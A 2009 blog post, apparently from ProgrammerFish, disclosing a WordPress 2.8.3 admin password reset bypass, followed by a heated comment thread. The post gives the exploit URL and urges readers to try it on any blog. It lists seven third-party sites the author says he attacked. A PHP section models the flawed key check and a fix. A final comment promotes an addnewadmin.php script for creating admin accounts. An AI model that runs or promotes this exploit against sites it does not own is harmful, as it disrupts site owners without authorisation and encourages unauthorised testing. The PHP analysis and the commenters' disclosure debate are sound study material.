Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation!
This is just way too exciting! WordPress, which is THE CMS of choice for bloggers, has such a big security hole! Someone has found a way to reset the admin password of any blog without any confirmation, and this can have serious consequences.
The hole is still open and even applies to the latest WordPress release, 2.8.3.
This is how it works:
The normal password reset page asks you for a username or email address. If it matches an account, a link carrying a one-time key is sent to the email address associated with that account; the password itself is not changed until that link is followed, so you can simply ignore the email and carry on.
But that key check can be bypassed: passing a specially crafted value in the key parameter of the reset page URL skips the emailed link entirely and resets the password of the first user account in the database, which is usually the admin. The new password is mailed to that account's address, so the attacker does not learn it, but the administrator is locked out until they read the mail.
This is all you have to do:
http://www.domainname.com/wp-login.php?action=rp&key[]=
Replace domainname with the domain of any blog running WordPress and see it for yourself!
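Here is how the bypass works at the code level, as an added example that is not code from the original post or from WordPress itself. It models the key check in WordPress 2.8.3's reset_password() beside a hardened check of the kind the 2.8.4 fix (changeset 11798) introduced, with a small stand-in for the database layer so it runs without MySQL. The FakeWpdb class, its user rows and the function names are assumptions made for this illustration; what it demonstrates is the behaviour described above: PHP parses key[]= as an array, preg_replace() maps over an array and returns one, empty() is false for a non-empty array, and the empty string that comes out of the sanitiser matches every account whose user_activation_key is blank (the default), so the first row, usually the admin, is selected.

```php
<?php
// Added example: models WordPress 2.8.3's reset_password() key check and a
// 2.8.4-style fix. Not WordPress's own code; FakeWpdb, its rows and the
// function names are assumptions made for this illustration.

class WP_Error {
    public $code;
    public $message;
    public function __construct($code, $message) {
        $this->code = $code;
        $this->message = $message;
    }
}

// Stand-in for the parts of wpdb this code path touches (assumption: no MySQL).
class FakeWpdb {
    public $users = 'wp_users';
    private $rows = [
        ['ID' => 1, 'user_login' => 'admin',  'user_activation_key' => ''],
        ['ID' => 2, 'user_login' => 'editor', 'user_activation_key' => ''],
        ['ID' => 3, 'user_login' => 'bob',    'user_activation_key' => 'k9f2a7c1'],
    ];

    // Mirrors the 2.8.x prepare(): a single array argument is unpacked into
    // the format arguments, so an array key becomes a plain %s substitution.
    public function prepare($query) {
        $args = func_get_args();
        array_shift($args);
        if (isset($args[0]) && is_array($args[0])) {
            $args = $args[0];
        }
        $query = str_replace("'%s'", '%s', $query);
        $query = str_replace('%s', "'%s'", $query);
        $args = array_map('addslashes', $args);
        return vsprintf($query, $args);
    }

    // Emulates the lookup by user_activation_key; the first matching row wins.
    public function get_row($sql) {
        if (!preg_match("/user_activation_key = '(.*)'$/", $sql, $m)) {
            return null;
        }
        foreach ($this->rows as $row) {
            if ($row['user_activation_key'] === stripslashes($m[1])) {
                return (object) $row;
            }
        }
        return null;
    }
}

// The 2.8.3 check: preg_replace() maps over an array and returns an array,
// and empty() is false for a non-empty array, so array("") reaches the query
// as a blank key that matches every account with no pending reset.
function reset_password_283(FakeWpdb $wpdb, $key) {
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if (empty($key)) {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if (empty($user)) {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    return $user; // the real function goes on to generate and email a new password
}

// Hardened check (this example's rendering of the fix, not the changeset
// verbatim): refuse anything that is not a non-empty string before sanitising,
// and treat a key that sanitises to "" as invalid even though the column is "".
function reset_password_fixed(FakeWpdb $wpdb, $key) {
    if (!is_string($key) || $key === '') {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ($key === '') {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if (empty($user)) {
        return new WP_Error('invalid_key', 'Invalid key');
    }
    return $user;
}

function describe($result) {
    return $result instanceof WP_Error
        ? "rejected ({$result->message})"
        : "would reset '{$result->user_login}' (ID {$result->ID})";
}

$wpdb = new FakeWpdb();

// What PHP makes of the query string in the URL above: $_GET['key'] is an array.
parse_str('action=rp&key[]=', $exploit_get);
echo "2.8.3 with key[]=  : ", describe(reset_password_283($wpdb, $exploit_get['key'])), "\n";
echo "fixed with key[]=  : ", describe(reset_password_fixed($wpdb, $exploit_get['key'])), "\n";

// A genuine key from the emailed link still resolves after the fix.
parse_str('action=rp&key=k9f2a7c1', $legit_get);
echo "2.8.3 with real key: ", describe(reset_password_283($wpdb, $legit_get['key'])), "\n";
echo "fixed with real key: ", describe(reset_password_fixed($wpdb, $legit_get['key'])), "\n";
```

Run it with php on the command line. The point to take away is that the original check validated the content of the key but never its type; any request parameter that can arrive as an array needs an is_string() (or equivalent) check before functions like preg_replace() and empty() are trusted to reject bad input.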
1) ProgrammerFish – Don’t waste time trying this on ProgrammerFish; it cannot be exploited now though.
2) TechToggle – I really like this blog though
3) TutPlus – Yeah yeah yeah!
4) Tutorial9
5) WordPress founder’s personal blog, ma.tt [I’m not sure whether it’s reset or not, but I think it is]
6) Noupe
7) PKPolitics
There are a couple others I tried this on and none of them was protected!
Note: I have just tried this as a proof-of-concept and nothing more than that. You will get an email with your new password and can always reset it yourself again. And sorry guys, open source is not the best thing on earth!
Update:
Read the detailed fix of this wordpress admin password reset exploit
Update 2:
Wordpress update 2.8.4 has been released.
says
Don’t you think you should give people a chance to fix it before blurting it out to the world? Nice job! And yes, that was sarcasm.
says
[...] there is still no patch in sight of the latest Wordpress Admin Password Reset exploit where anyone can reset admin password of any blog hosted on Wordpress without any [...]
says
[...] sure if this has been posted: Major WordPress security flaw. Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation! | ProgrammerFish – E… I have confirmed this is true and have updated my WordPress installs. I urge everyone to do this [...]
says
You are such an asshole.
The least you could have done was offer a fix. You are part of the problem, not the solution.
says
I was trying to get this to work against my own website and not having any luck. A change made in revision 10721 is what made this exploit possible, websites running older code are unaffected. This bug has been fixed in revision 11797 as of this morning.
says
Right, because the only way to ensure security is by hiding vulnerabilities rather than disclosing them, amirite guys?
says
So when you do this, doesn’t it just email the admin the new password? That’s what it does on my blog. It’s not really dangerous, just annoying. How does a hacker gain anything from this?
says
no, you’re wrong. You’re just a douchey little man. You don’t hide vulnerabilities you report them to the software vendor and allow them time to release a fix for the problem. Publicizing it to the world in this manner doesn’t help anybody.
says
@Nathan,
I wasn’t pissed because the flaw was disclosed. I was pissed because he offered no solution. Disclosing a flaw without offering a fix (when you do in fact have one), is just plain irresponsible.
It appears he has linked to an actual solution.
says
Here is a fix from the official site:
http://core.trac.wordpress.org/changeset/11798
says
[...] The fix to WordPress can be made by hand, if you know how and dare to. More information here. [...]
says
Why full disclosure doesn’t work:
http://www.upload.mn/view/202etl1wpd73zjlz0a18.jpg
says
Security flaw? So, you can reset the password. And this affords you what access to the site exactly? This can go down as an annoyance at best, not a “security flaw” as you are blindly labelling it.
says
You sir, get my vote douchebag of the year!
Closed source, proprietary software has never had any sort of flaw like this, right?
says
@chris,
Is a random user supposed to be able to reset an admin password? If not, then I would classify it as a security flaw.
says
Thanks for sending it to the vendor first to allow them to fix it. What a dick.
says
[...] domain with the website in question. The source shows examples of well-known blogs affected by the vulnerability, for example [...]
says
All software has bugs, regardless of if it’s open source or not.
You are a dumb prick for not publishing the fix.
says
You say “OpenSource is not the best thing on earth!” Yet you have a wordpress blog (and seem to like it)
You also steal from [Full-Disclosure].
Best watch yourself.
says
Such happened to me last night, I did this
http://www.flyninja.net/?p=1079
says
I’m sorry, but you are not a programmer. A programmer does NOT use his or her talents to cause misery for the rest of us. In the future, if you find something like this, you tell the developers, provide a patch, and then shut up until a new version is released AND has had several months to propagate.
At any rate, here is the relevant code:
// From reset_password(): strip everything except [a-z0-9] from the key
$key = preg_replace('/[^a-z0-9]/i', '', $key);
if ( empty( $key ) )
    return new WP_Error('invalid_key', __('Invalid key'));
// Look up the account whose pending activation key matches
$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
    return new WP_Error('invalid_key', __('Invalid key'));
I tried this on my own WP install in a separate file and it failed to pass the second checkpoint. It could be something about my WP install, PHP configuration, or whatever, but your exploit doesn’t work here. Of course, I’ve applied the fix, but it doesn’t change the fact that you have wasted thousands upon thousands of man-hours by choosing this route because each and every blog owner has to patch their own blog instead of waiting for the centrally-deployed WP update. I won’t be too surprised if someone gets the brilliant idea to sue the pants off of you. Or just simply bludgeon you with the computer you used to write this blog post with.
Now, what I should point out is that this exploit is FAR more serious than you realize. WP uses extract() and empty() calls all over the place in the WP code base (which made me rather nervous the first time I saw the code – it tells me the programmers are lazy). If something like this is lurking around because of those calls, then who knows what else can be done. You sir, are an idiot for not thinking about repercussions, publicly announcing this without talking to the WP developers first, and wasting my time. This took me approximately 45 minutes to analyze (I don’t apply code until I know exactly what it does) and fix. You owe the organization I work for $25. We accept cash, check, and credit card payments.
No. Seriously. You owe us $25. Everyone here should post exactly how much time you waste fixing this in your WP install and how much you think this person owes you/your business.
says
@NATHAN
You are a douche as well. There are *ways* to disclose this stuff and this is not the way.
says
And you all bash this guy for publishing this? Bash him because he did not offer you a fix?
The author didn’t say he was the one who found the exploit, or even try to claim that he was.
Fix it yourself until the next Wordpress release which fixes it is released. Some of you douchebags seem to act like everyone has to hold your hand.
Oh ya, to add to the whole ’security’ and ‘flaw’ confusion. A security flaw grants unauthorized access to something such as an admin area, this is nothing but a bug.
says
You’re a moron. You find a security hole and your first idea is “Hey, why don’t I go use this on a bunch of websites I don’t own”?
says
You are a douche. You should always give the owner a chance to fix their issues before making them public. WP never claims to be 100% bug free and always pushes updates quickly. No programmer(s) have ever coded something that is perfect out of the gate.
And moreover this is not a security issue. You are the problem here. Telling half truths and not giving the folks at wp a chance to fix it before going public.
says
Even better, he published the list of sites he illegally accessed, and provided screen shots as evidence.
says
I am absolutely astonished that you would even call this a security flaw. If it were a security flaw, it would allow the hacker access. This makes it hard for me to take your blog seriously anymore.
says
[...] http://www.programmerfish.com/wordpress-security-flaw-reset-admin-password-of-any-blog-without-conf... [...]
says
So, where do you draw the line to what is acceptable and what isn’t? Sure, you can go around and force a password reset on sites you don’t own (or administer) and maybe no one really gets hurt. If you found a bug in, say, the Secret Service protecting the president, would you attempt an assassination just to make a point?
Once a script kiddy always a …
says
[...] Posted in blog | Posted on 11-08-2009 | 1 Comment Tags: wordpress This morning, someone tried logging into Blondish.net 4 times. Or well, they reset my password 4 times! This was not a big issue as my email account was not compromised. However I found that this was not a singular issue as it was widespread. Also, when I checked my recent visitor stats, they all were directly to my WordPress login page. ProgrammerFish blogged about it in their article Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation! [...]
says
[...] to other CMS and not compromise their security again. We exposed how vulnerable Wordpress was to a remote admin password reset exploit that resets your admin password without any confirmation and this could mean hackers can exploit it [...]
says
[...] Password Reset Bug http://www.programmerfish.com/wordpress-security-flaw-reset-admin-password-of-any-blog-without-confi... [...]
says
@You do not qualify, sorry bud, but he owes you nothing. Proprietary software, maybe; OSS, no.
Sure, the author may be liable for the costs of fixing the sites he posted his own proof of doing it to, and he is certainly a jackass for encouraging others to do this to sites they do not own, but you’re living on Mars if you think you’re owed money. It’s more likely you owe your company money, if you billed for the time taken to post your personal rant.
says
[...] on Twitter last week), then they discover that someone is also taking advantage of a vulnerability in Wordpress version 2.8.3 discovered [...]
says
The least you could have done was offer a fix. You are part of the problem, not the solution.
says
@jessica
Did you read the complete post? Please don’t comment before reading it all. I have provided a solution already!
says
@Salman, too little too late, you’re still an idiot
says
Seems that you’ve done a very good job of hyping this flaw into something more than it really is.
IF this exploit had allowed the users to email a password to an address controlled by them, or IF this allowed to inject a new user / password set in to the authentication database without any further interaction, then this could “have serious consequences.” – As it stands, all this can really do is cause mild irritation for the operators of the blog.
That said, thanks for pointing the flaw out.
I’m glad that the WP community have fixed it. It is shame that you didn’t post the fix along with this article in the first place, but, well, I guess that wasn’t the point of this post, was it?
says
You must be the most arrogant guy on earth…
says
Shame the fix wasn’t on here when you published this
I am just glad this wasn’t an actual security flaw where people could have taken control of the admin accounts, but at the end of the day I found the fix myself after landing here via other pages, so I guess thanks are actually in order for highlighting this minor issue in the first place.
says
OK. So you find a problem with WordPress and go shouting like this? Is that a way to solve such problems?
And on top of that, you tried it on good blogs and then are proud of it.
I guess you must have heard about the WordPress.org website! Just go there and report an issue next time without playing with others’ blogs this way.
Your post did more harm than good. Shouting Monkey!
says
And I forgot this:
Then why are you using WordPress? Go get a good software developed for yourself and stop using Open Source if you think so!
says
We all agree now, you’re a douche.
says
[...] Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation! | ProgrammerFish … Wordpress flaw open in all versions, there is a fix however. (tags: wordpress security cracking password cms) [...]
says
There are a dozen websites that I CANNOT fix in a hurry as I am traveling. With your exploit in the open, and knowing that this is not just a problem with the login page, this means my sites are at risk because of the information you have disclosed.
If any of my sites are affected, I’m going to come after you with a vengeance. This is NOT the way to disclose exploits.
says
I read about this before the update. but didn’t patch my blog. This is an annoyance not a security flaw. Granted, it needed to be fixed and I was happy to apply 2.8.4 today.
I won’t resort to name calling. But please, save us having to vote you off of wordpress. Leave open source and go back to Microsoft products. We don’t need people like you in the open source world, all you did was feed the script kiddies who have nothing better to do than to sit in their parents basement, copy your “exploit” and click on as many blogs as they can find. Giggling each time and telling all their friends Xbox live and WOW about how they are a “Haxor” and how many sites they “pwnd” when they should have been doing their homework.
Thanks Idiot. (crap, I said I wouldn’t resort to name calling) oh well, it’s already typed.
P.S. Put down WOW and do your homework.
says
All of you commenters that think that people owe you something live in an alternate world. If this is your business you should have a security company test your website. He could have leaked this minor bug to the blackhat community and let some real crackers take apart some sites, but no he posted it publicly so that it would get fixed. Go and cry some more that you are using some free software and someone showed you that you get no guarantees with that. Grow up, and be glad that your site is fixed. The proper response for the comments should be “Thank You.”
You really shouldn’t have used that on other peoples sites though, that is kinda rude.
says
Hi Sanity.
Good point: Salman owes us nothing. On the other hand, if you’re going to write about a security problem:
1] DON’T misrepresent the seriousness of the problem in order to try and make it sound more important than it actually is.
2] DON’T test it on other people’s live production websites.
3] DO provide a fix immediately if you have one available.
If you break any of the above guidelines, then you can reasonably expect scorn and derision from a lot of webmasters.
Sorry Salman: I’m sure you’re a lovely chap. Hope you’ve learned a lesson from this one.
says
@Sanity
Thanks for the comment. Seems like you’re one of the few sane people who first thought of it before commenting.
BTW Does anyone know what TechCrunch did with Twitter’s secret documents they were able to get their hands on? They blew it out of proportion to the extent of actually blackmailing them. We did nothing of that sort and all I did was test and show it that it’s still open.
And yes, the fix was posted exactly 4 mins after I published the post but yes 4 minutes seems like a century to most of us here!
Anyways, thanks for those who took it the right way instead of taking me as a ’script guy’. Please go read some of my posts first before you comment again. Thanks.
says
[...] the need for confirmation when resetting a user password. So an attacker could very easily wipe the login password of the first user account in the database (usually admin) on any website. The new password was [...]
says
[...] Less than 24 hours later, WordPress version 2.8.4 came out, along with all the explanations. [...]
says
[...] ways in which to respectfully report security vulnerabilities. An article on the vulnerability published by Programmerfish.com in my opinion did more harm than good. The article discusses the vulnerability, explains how to put [...]
says
First, I have found bugs and security issues on free products. And my first action was to report it to the software’s developer community.
Even, I have open-source products of my own, and I would love someone reporting security issues than to report to the rest of the world.
We developers are, at the end, human beings and cannot be software goddesses with premonitory powers!
No wonder your name is Salman Ul Haq.
And BTW, did you even buy this Thesis theme at all? Or is it pirated? I have some Thesis security flaws known and you would not want me to implement them on you.
@Sanity: (i believe it is self-posted by author)
Please do not degrade the position of free / open-source softwares. And BTW, even paid softwares can be open-source.
says
Hey good stuff…keep up the good work!
says
[...] are not new and even though most of them could do little or no harm but just irritation like the admin password reset exploit which we reported and had to face a lot of heat from the community over the way the exploit was [...]
says
[...] Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation! – Programmer Fish [...]
says
[...] admin. Wow. Good job. He does this several times, possibly believing he can exploit a known WordPress weakness. Which was fixed a while [...]
says
All Hail Microsoft!!!
says
As a freelancer, most of the time I need to add a new admin and quickly log in to test a new plugin or theme.
I use the addnewadmin script. http://hecode.com/addnewadmin
Simply copy addnewadmin.php into the root of your WordPress path and navigate to it, and add as many new admins as you need. You can log in with the second admin and change/add the original admin’s info if needed.